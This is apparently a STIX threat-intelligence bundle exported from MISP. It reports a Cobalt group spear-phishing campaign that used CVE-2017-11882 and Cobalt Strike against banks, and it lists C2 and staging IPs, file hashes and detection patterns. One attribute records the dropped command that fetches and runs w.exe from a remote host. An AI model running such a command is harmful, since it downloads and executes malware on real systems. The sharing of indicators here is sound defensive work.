{ "type": "bundle", "id": "bundle--5a25117c-6260-44a1-91b4-489d02de0b81", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-05T03:00:30.000Z", "modified": "2017-12-05T03:00:30.000Z", "name": "CIRCL", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--5a25117c-6260-44a1-91b4-489d02de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-05T03:00:30.000Z", "modified": "2017-12-05T03:00:30.000Z", "name": "OSINT - Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions", "published": "2017-12-28T13:28:31Z", "object_refs": [ "observed-data--5a25118a-c6f8-4fed-9728-45e002de0b81", "url--5a25118a-c6f8-4fed-9728-45e002de0b81", "x-misp-attribute--5a2511a6-d02c-4685-9c2f-458702de0b81", "vulnerability--5a251915-1914-4a0a-bf26-453102de0b81", "x-misp-attribute--5a25192f-78d8-43ac-a5e7-448402de0b81", "indicator--5a251955-b768-423a-9ce5-43dc02de0b81", "observed-data--5a25197e-d52c-4094-a610-4e3b02de0b81", "url--5a25197e-d52c-4094-a610-4e3b02de0b81", "indicator--5a2519a1-f3c4-4887-bb32-4b8102de0b81", "indicator--5a2519a1-34b0-4da9-b685-421e02de0b81", "indicator--5a2519da-6f38-4196-a492-431202de0b81", "indicator--5a251a0c-d1c4-43ca-b569-448202de0b81" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "misp-galaxy:threat-actor=\"Cobalt\"", "circl:topic=\"finance\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5a25118a-c6f8-4fed-9728-45e002de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:13:49.000Z", "modified": "2017-12-04T09:13:49.000Z", "first_observed": "2017-12-04T09:13:49Z", "last_observed": "2017-12-04T09:13:49Z", "number_observed": 1, "object_refs": [ "url--5a25118a-c6f8-4fed-9728-45e002de0b81" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"", "osint:certainty=\"93\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5a25118a-c6f8-4fed-9728-45e002de0b81", "value": "https://www.riskiq.com/blog/labs/cobalt-strike/" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5a2511a6-d02c-4685-9c2f-458702de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:13:49.000Z", "modified": "2017-12-04T09:13:49.000Z", "labels": [ "misp:type=\"text\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"", "osint:certainty=\"93\"" ], "x_misp_category": "External analysis", "x_misp_type": "text", "x_misp_value": "In a recent spear-phishing campaign, the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike. However, they gave up much more information than they intended.\r\n\r\nOn Tuesday, November 21, a massive spear-phishing campaign began targeting individual employees at various financial institutions, mostly in Russia and Turkey. Purporting to provide info on changes to \u00e2\u20ac\u02dcSWIFT\u00e2\u20ac\u2122 terms, the email contained a single attachment with no text in the body." }, { "type": "vulnerability", "spec_version": "2.1", "id": "vulnerability--5a251915-1914-4a0a-bf26-453102de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:44:53.000Z", "modified": "2017-12-04T09:44:53.000Z", "name": "CVE-2017-11882", "labels": [ "misp:type=\"vulnerability\"", "misp:category=\"Payload delivery\"" ], "external_references": [ { "source_name": "cve", "external_id": "CVE-2017-11882" } ] }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5a25192f-78d8-43ac-a5e7-448402de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:45:19.000Z", "modified": "2017-12-04T09:45:19.000Z", "labels": [ "misp:type=\"text\"", "misp:category=\"Artifacts dropped\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Artifacts dropped", "x_misp_type": "text", "x_misp_value": "cmd /c start \\\\138.68.234.128\\w\\w.exe &AAAAAC" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a251955-b768-423a-9ce5-43dc02de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:45:57.000Z", "modified": "2017-12-04T09:45:57.000Z", "description": "At RiskIQ, one of the datasets built from our large quantities of Internet data is a repository of SSL certificates and where we\u00e2\u20ac\u2122ve seen them. What\u00e2\u20ac\u2122s interesting about the case mentioned above is that the host is using a certificate seemingly shipped with Cobalt Strike by default. We can look up the certificate in RiskIQ Community via its SHA1 fingerprint", "pattern": "[x509-certificate:hashes.SHA1 = '6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:45:57Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"x509-fingerprint-sha1\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5a25197e-d52c-4094-a610-4e3b02de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:46:38.000Z", "modified": "2017-12-04T09:46:38.000Z", "first_observed": "2017-12-04T09:46:38Z", "last_observed": "2017-12-04T09:46:38Z", "number_observed": 1, "object_refs": [ "url--5a25197e-d52c-4094-a610-4e3b02de0b81" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5a25197e-d52c-4094-a610-4e3b02de0b81", "value": "https://community.riskiq.com/projects/19bb67dd-2c51-7284-e5f2-7b79537e13d3" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a2519a1-f3c4-4887-bb32-4b8102de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:47:13.000Z", "modified": "2017-12-04T09:47:13.000Z", "description": "Payload staging server", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '138.68.234.128']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:47:13Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a2519a1-34b0-4da9-b685-421e02de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:47:13.000Z", "modified": "2017-12-04T09:47:13.000Z", "description": "Cobalt Strike server", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '104.144.207.207']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:47:13Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a2519da-6f38-4196-a492-431202de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:48:10.000Z", "modified": "2017-12-04T09:48:10.000Z", "pattern": "[file:hashes.MD5 = 'f360d41a0b42b129f7f0c29f98381416' AND file:name = 'Swift changes.rtf' AND file:x_misp_text = 'CVE-2017-11882 exploit document downloading Cobalt Strike beacon' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:48:10Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a251a0c-d1c4-43ca-b569-448202de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:49:23.000Z", "modified": "2017-12-04T09:49:23.000Z", "pattern": "[file:hashes.MD5 = 'd46df9eacfe7ff75e098942e541d0f18' AND file:name = 'w.exe' AND file:x_misp_text = 'Cobalt Strike beacon' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:49:23Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }